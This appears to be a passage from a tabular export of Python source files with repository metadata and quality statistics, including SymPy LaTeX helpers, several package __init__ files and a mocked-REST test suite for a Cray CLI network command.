sub_list += [op, eval_formula(formula)]
else:
base_string = "{} {}" + base_string
sub_list = [eval_formula(formula), op] + sub_list
else:
if formula_suffix:
base_string += "{} {}"
sub_list += [op, formula]
else:
base_string = "{} {}" + base_string
sub_list = [formula, op] + sub_list
sub_list = [x for x in sub_list]
comb_string = base_string.format(*sub_list)
if not display:
return comb_string
return Math(comb_string)
def linear_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{lin}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def convex_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{co}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def affine_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{aff}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def generate_parametric_poly(degree, symbol="x", coef="a", domain="ZZ", display=True):
from sympy import parse_expr
coefs = [Symbol(f"{coef}_{i}", real=True) for i in range(0, degree)]
expr = ""
for i in range(0, degree):
expr += f"+ {coefs[i]}*{symbol}**{i}"
return parse_expr(expr)
def show_eigenvects(symbol, eigenvect_list):
formulae = []
for i in range(0, len(eigenvect_list)):
eigenvalue = "{" + str(eigenvect_list[i][0]) + "}"
eigenv_mult = eigenvect_list[i][1]
eigenvectors = eigenvect_list[i][2]
formulae += [
show_matrix(
"{}_{}".format(symbol, eigenvalue),
Matrix([eigenvectors]),
display=False,
formula_align=True,
)
]
return eqn_align(formulae, display=True)
| 37.863866 | 298 | 0.651516 | 2,957 | 22,529 | 4.839702 | 0.082854 | 0.039131 | 0.029348 | 0.024946 | 0.805674 | 0.789533 | 0.765355 | 0.747816 | 0.721822 | 0.716652 | 0 | 0.000781 | 0.260953 | 22,529 | 594 | 299 | 37.927609 | 0.858739 | 0.483111 | 0 | 0.665823 | 0 | 0.002532 | 0.106295 | 0.035909 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037975 | false | 0 | 0.01519 | 0.007595 | 0.118987 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
222ee95b0b8e68ddeffa2178a31108f0c0feb1cf | 37 | py | Python | tardis/montecarlo/__init__.py | GOLoDovkA-A/tardis | 847b562022ccda2db2486549f739188ba48f172c | [
"BSD-3-Clause"
] | 176 | 2015-02-26T07:26:59.000Z | 2022-03-16T18:26:22.000Z | tardis/montecarlo/__init__.py | GOLoDovkA-A/tardis | 847b562022ccda2db2486549f739188ba48f172c | [
"BSD-3-Clause"
] | 1,474 | 2015-02-12T13:02:16.000Z | 2022-03-31T09:05:54.000Z | tardis/montecarlo/__init__.py | GOLoDovkA-A/tardis | 847b562022ccda2db2486549f739188ba48f172c | [
"BSD-3-Clause"
] | 434 | 2015-02-07T17:15:41.000Z | 2022-03-23T04:49:38.000Z | from tardis.montecarlo.base import *
| 18.5 | 36 | 0.810811 | 5 | 37 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
97d36fbcc0b35b21018d40f861c83b8c43d997be | 195 | py | Python | moto/iot/__init__.py | jonnangle/moto-1 | 40b4e299abb732aad7f56cc0f680c0a272a46594 | [
"Apache-2.0"
] | 3 | 2020-08-04T20:29:41.000Z | 2020-11-09T09:28:19.000Z | moto/iot/__init__.py | jonnangle/moto-1 | 40b4e299abb732aad7f56cc0f680c0a272a46594 | [
"Apache-2.0"
] | 17 | 2020-08-28T12:53:56.000Z | 2020-11-10T01:04:46.000Z | moto/iot/__init__.py | jonnangle/moto-1 | 40b4e299abb732aad7f56cc0f680c0a272a46594 | [
"Apache-2.0"
] | 2 | 2017-03-02T05:59:52.000Z | 2020-09-03T13:25:44.000Z | from __future__ import unicode_literals
from .models import iot_backends
from ..core.models import base_decorator
iot_backend = iot_backends["us-east-1"]
mock_iot = base_decorator(iot_backends)
| 27.857143 | 40 | 0.830769 | 29 | 195 | 5.172414 | 0.551724 | 0.22 | 0.213333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005682 | 0.097436 | 195 | 6 | 41 | 32.5 | 0.846591 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
97d6c6f437970b1f3293a80c8433ab5f6517ca53 | 17,689 | py | Python | tests/test_functional/test_network.py | ardangelo/craycli | a943ff2d069aadd319ad4ea3ed344c791797fd53 | [
"MIT"
] | 1 | 2022-03-01T20:40:15.000Z | 2022-03-01T20:40:15.000Z | tests/test_functional/test_network.py | ardangelo/craycli | a943ff2d069aadd319ad4ea3ed344c791797fd53 | [
"MIT"
] | 2 | 2022-02-25T20:48:55.000Z | 2022-03-16T11:07:33.000Z | tests/test_functional/test_network.py | ardangelo/craycli | a943ff2d069aadd319ad4ea3ed344c791797fd53 | [
"MIT"
] | 2 | 2022-03-08T17:49:40.000Z | 2022-03-15T22:22:41.000Z | """ Test the main CLI command (`cray`) and options.
MIT License
(C) Copyright [2020] Hewlett Packard Enterprise Development LP
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
# pylint: disable=redefined-outer-name, invalid-name, unused-import
# pylint: disable=too-many-arguments, unused-argument
import json
import os
import re
from ..utils.runner import cli_runner
from ..utils.rest import rest_mock
basePath = 'apis/network/v1'
def test_cray_nms_network_base(cli_runner, rest_mock):
""" Test `cray network` to make sure the expected commands are available """
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network'])
assert result.exit_code == 0
outputs = [
"Network Manager REST API",
"networks",
"nics",
"list",
"network [OPTIONS] COMMAND [ARGS]..."
]
for out in outputs:
assert out in result.output
# GET /lswitches
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'list'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, 'lswitches'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
def test_cray_nms_nics(cli_runner, rest_mock):
""" Test `cray network nics` to make sure the expected commands are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existance at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'nics'])
assert result.exit_code == 0
outputs = [
"Usage: cli network nics [OPTIONS] COMMAND [ARGS]...",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
# GET /lswitches/singleFabric/nics
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'nics', 'list', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/nics']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
def test_cray_nms_networks(cli_runner, rest_mock):
""" Test `cray network networks` to make sure the expected commands
are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks [OPTIONS] COMMAND [ARGS]...",
"dnsservices",
"nics",
"create",
"delete",
"describe",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
# POST /lswitches/singleFabric/networks only required
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'create', "--vlan-id", "100",
"--net-cidr", "10.0.1.0/24", "--name", "net1",
"singleFabric"]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {
'vlanID':100,
'netCIDR': '10.0.1.0/24',
'name': 'net1'
}
# Check the response from server ... no mock available
# POST /lswitches/singleFabric/networks with optionals
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'create', "--vlan-id", "100",
"--net-cidr", "10.0.1.0/24", "--name", "net1",
"--nic-xnames", 'nic1, nic2', "--ipv6-prefix",
"ipPrefix", "singleFabric"]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {
'vlanID':100,
'netCIDR': '10.0.1.0/24',
'name': 'net1',
'nicXnames': ["nic1", "nic2"],
'ipv6Prefix': 'ipPrefix'
}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks
runner, cli, _ = cli_runner
result = runner.invoke(
cli, ['network', 'networks', 'list', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# GET /lswitches/singleFabric/networks/{netName}
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'describe', 'net1',
'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
[
'(.*)',
basePath,
'lswitches/singleFabric/networks/net1']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'delete', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
[
'(.*)',
basePath,
'lswitches/singleFabric/networks/net1'
]
)+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert not 'body' in data
def test_cray_nms_networks_nics(cli_runner, rest_mock):
""" Test `cray network networks nics` to make sure the expected commands
are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'nics'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks nics [OPTIONS] COMMAND [ARGS]...",
"create",
"delete",
"describe",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
nicsPath = 'lswitches/singleFabric/networks/net1/nics'
# POST /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(
cli, ['network', 'networks', 'nics', 'create',
'--nic-xnames', 'nic1, nic2', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {'nicXnames': ["nic1", "nic2"]}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'nics', 'list',
'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'nics', 'delete',
'--nic-xnames', 'nic1, nic2', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert data['body'] == {'nicXnames': ["nic1", "nic2"]}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/nics/{nicXname}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'nics', 'describe', 'nic1',
'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath + '/nic1'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/nics/{nicXname}
#runner, cli, _ = cli_runner
#result = runner.invoke(cli, ['network', 'networks', 'nics', 'delete', 'nic1',
# 'net1', 'singleFabric'])
#assert result.exit_code == 0
#data = json.loads(result.output)
#assert re.match('/'.join(['(.*)', basePath, nicsPath + '/nic1'])+"$", data['url']) != None
#assert data['method'] == 'DELETE'
# Check the response from server ... no mock available
def test_cray_nms_networks_dnsservices(cli_runner, rest_mock):
"""Test `cray network networks dnsservices` to make sure the expected
commands are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks dnsservices [OPTIONS] COMMAND [ARGS]...",
"hosts",
"list"
]
for out in outputs:
assert out in result.output
dnsPath = 'lswitches/singleFabric/networks/net1/dnsservices'
#
# Check the request URL and Body
#
# GET /lswitches/singleFabric/networks/{netName}/dnsservices
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'list',
'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
def test_cray_nms_networks_dnsservices_hosts(cli_runner, rest_mock):
""" Test `cray network networks dnsservices hosts` to make sure the
expected commands are available.
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'dnsservices', 'hosts']
)
assert result.exit_code == 0
outputs = [
"Usage: cli network networks dnsservices hosts [OPTIONS] COMMAND [ARGS]...",
"create",
"delete",
"describe",
"list",
"replace",
"update"
]
for out in outputs:
assert out in result.output
dnsHostPath = 'lswitches/singleFabric/networks/net1/dnsservices/dns1/hosts'
# GET /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'hosts',
'list', 'dns1', 'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# POST /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'hosts',
'create', '--host-ip', 'ip1', '--host-name',
'host1', 'dns1', 'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath])+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {'hostIP': 'ip1', 'hostName': 'host1'}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'describe', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'delete', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert not 'body' in data
# Check the response from server ... no mock available
# PUT /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'replace', '--host-ip', 'ip1', '--host-name', 'host1',
'--host-aliases', 'alias1, alias2', 'ip1', 'dns1',
'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'PUT'
assert data['body'] == {'hostIP': 'ip1', 'hostName': 'host1',
'hostAliases':["alias1", "alias2"]}
# Check the response from server ... no mock available
# PATCH /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'update', '--host-ip', 'ip1', '--host-aliases',
'alias1, alias2', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'PATCH'
assert (
data['body'] == {'hostIP': 'ip1', 'hostAliases':["alias1", "alias2"]}
)
# Check the response from server ... no mock available
| 32.757407 | 100 | 0.577647 | 1,938 | 17,689 | 5.214654 | 0.119195 | 0.028498 | 0.029685 | 0.044528 | 0.837621 | 0.822878 | 0.81318 | 0.798338 | 0.78211 | 0.752721 | 0 | 0.011267 | 0.277461 | 17,689 | 539 | 101 | 32.818182 | 0.779438 | 0.282266 | 0 | 0.672823 | 0 | 0 | 0.21737 | 0.027292 | 0 | 0 | 0 | 0 | 0.221636 | 1 | 0.015831 | false | 0 | 0.013193 | 0 | 0.029024 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3f0f9227c71ad943bea5370e03dc553953dc0758 | 89 | py | Python | examples/aditi/sarkar/admin.py | navycut/navycut | 1d49621105c7c4683d52a3d2c853ae7165b9dc0d | [
"MIT"
] | 13 | 2021-04-26T04:00:36.000Z | 2021-09-18T19:57:58.000Z | examples/aditi/sarkar/admin.py | navycut/navycut | 1d49621105c7c4683d52a3d2c853ae7165b9dc0d | [
"MIT"
] | 6 | 2021-07-15T16:30:33.000Z | 2021-09-09T04:51:03.000Z | examples/aditi/sarkar/admin.py | navycut/navycut | 1d49621105c7c4683d52a3d2c853ae7165b9dc0d | [
"MIT"
] | 7 | 2021-07-21T06:21:55.000Z | 2021-09-02T17:58:04.000Z | from navycut.contrib.admin import admin
from .models import *
admin.register_model(Band) | 22.25 | 39 | 0.820225 | 13 | 89 | 5.538462 | 0.692308 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 89 | 4 | 40 | 22.25 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3f1b83b321ee435d92a70e19d8de3835cec4cafb | 35 | py | Python | 4_advanced/ai-py-injection-factory/tests/support/solvers/__init__.py | grecoe/teals | ea00bab4e90d3f71e3ec2d202ce596abcf006f37 | [
"MIT"
] | null | null | null | 4_advanced/ai-py-injection-factory/tests/support/solvers/__init__.py | grecoe/teals | ea00bab4e90d3f71e3ec2d202ce596abcf006f37 | [
"MIT"
] | 9 | 2019-11-21T13:12:47.000Z | 2021-02-02T14:52:52.000Z | 4_advanced/ai-py-injection-factory/tests/support/solvers/__init__.py | grecoe/teals | ea00bab4e90d3f71e3ec2d202ce596abcf006f37 | [
"MIT"
] | 2 | 2021-01-25T03:38:30.000Z | 2021-03-07T23:54:53.000Z | from .testsolver import DummySolver | 35 | 35 | 0.885714 | 4 | 35 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
58d0bd6bb3fe415a93fdea57fd35f31ab65fd42e | 174 | py | Python | pyN/Populations/__init__.py | ericjang/pyN | c2fb35579c12df20b792408b69d92cab215c42b1 | [
"BSD-2-Clause"
] | 5 | 2018-02-26T17:50:33.000Z | 2019-05-18T10:10:57.000Z | pyN/Populations/__init__.py | ericjang/pyN | c2fb35579c12df20b792408b69d92cab215c42b1 | [
"BSD-2-Clause"
] | 1 | 2020-12-12T20:02:30.000Z | 2021-04-13T08:05:01.000Z | pyN/Populations/__init__.py | ericjang/pyN | c2fb35579c12df20b792408b69d92cab215c42b1 | [
"BSD-2-Clause"
] | 5 | 2016-02-27T14:08:06.000Z | 2019-05-15T13:32:50.000Z | from pyN.Populations.IzhikevichPopulation import *
from pyN.Populations.AdExPopulation import *
#Hodgkin-Huxley Populations not quite working yet.
#from HHPopulation import * | 43.5 | 50 | 0.83908 | 20 | 174 | 7.3 | 0.65 | 0.09589 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097701 | 174 | 4 | 51 | 43.5 | 0.929936 | 0.431034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
58d8fb40cc35b473dd0edd93e1a44b2f95e487c9 | 66 | py | Python | nilmtk/disaggregate/__init__.py | pilillo/nilmtk | 00bb1f948b6de1cc5c891102728c19b9bfc7c739 | [
"Apache-2.0"
] | null | null | null | nilmtk/disaggregate/__init__.py | pilillo/nilmtk | 00bb1f948b6de1cc5c891102728c19b9bfc7c739 | [
"Apache-2.0"
] | null | null | null | nilmtk/disaggregate/__init__.py | pilillo/nilmtk | 00bb1f948b6de1cc5c891102728c19b9bfc7c739 | [
"Apache-2.0"
] | null | null | null | from .combinatorial_optimisation import CombinatorialOptimisation
| 33 | 65 | 0.924242 | 5 | 66 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 66 | 1 | 66 | 66 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
58df1de21440b60b5459bf1b7bcb21a359a384e9 | 44 | py | Python | mlbench/__init__.py | jacxhanx/mlbench | 70a867b646f658fc9e76f11c1252a830fa493bc3 | [
"MIT"
] | null | null | null | mlbench/__init__.py | jacxhanx/mlbench | 70a867b646f658fc9e76f11c1252a830fa493bc3 | [
"MIT"
] | null | null | null | mlbench/__init__.py | jacxhanx/mlbench | 70a867b646f658fc9e76f11c1252a830fa493bc3 | [
"MIT"
] | null | null | null | # import mlbench.data
# import mlbench.train | 22 | 22 | 0.795455 | 6 | 44 | 5.833333 | 0.666667 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 44 | 2 | 22 | 22 | 0.897436 | 0.909091 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
45216b300dc01e8dca02502754ec05fe30df36d7 | 168 | py | Python | topicnet/cooking_machine/__init__.py | bt2901/TopicNet | cab4c5a5fa259a5709e736c819598caf84841206 | [
"MIT"
] | 123 | 2019-09-11T15:35:47.000Z | 2022-03-03T02:00:45.000Z | topicnet/cooking_machine/__init__.py | bt2901/TopicNet | cab4c5a5fa259a5709e736c819598caf84841206 | [
"MIT"
] | 65 | 2019-10-14T13:24:31.000Z | 2022-03-27T18:45:00.000Z | topicnet/cooking_machine/__init__.py | bt2901/TopicNet | cab4c5a5fa259a5709e736c819598caf84841206 | [
"MIT"
] | 15 | 2019-10-16T20:17:55.000Z | 2022-03-30T21:46:54.000Z | from .dataset import Dataset
from .dataset import BaseDataset
from .experiment import Experiment
from .model_constructor import *
from .dataset_cooc import DatasetCooc
| 28 | 37 | 0.845238 | 21 | 168 | 6.666667 | 0.428571 | 0.235714 | 0.242857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 168 | 5 | 38 | 33.6 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
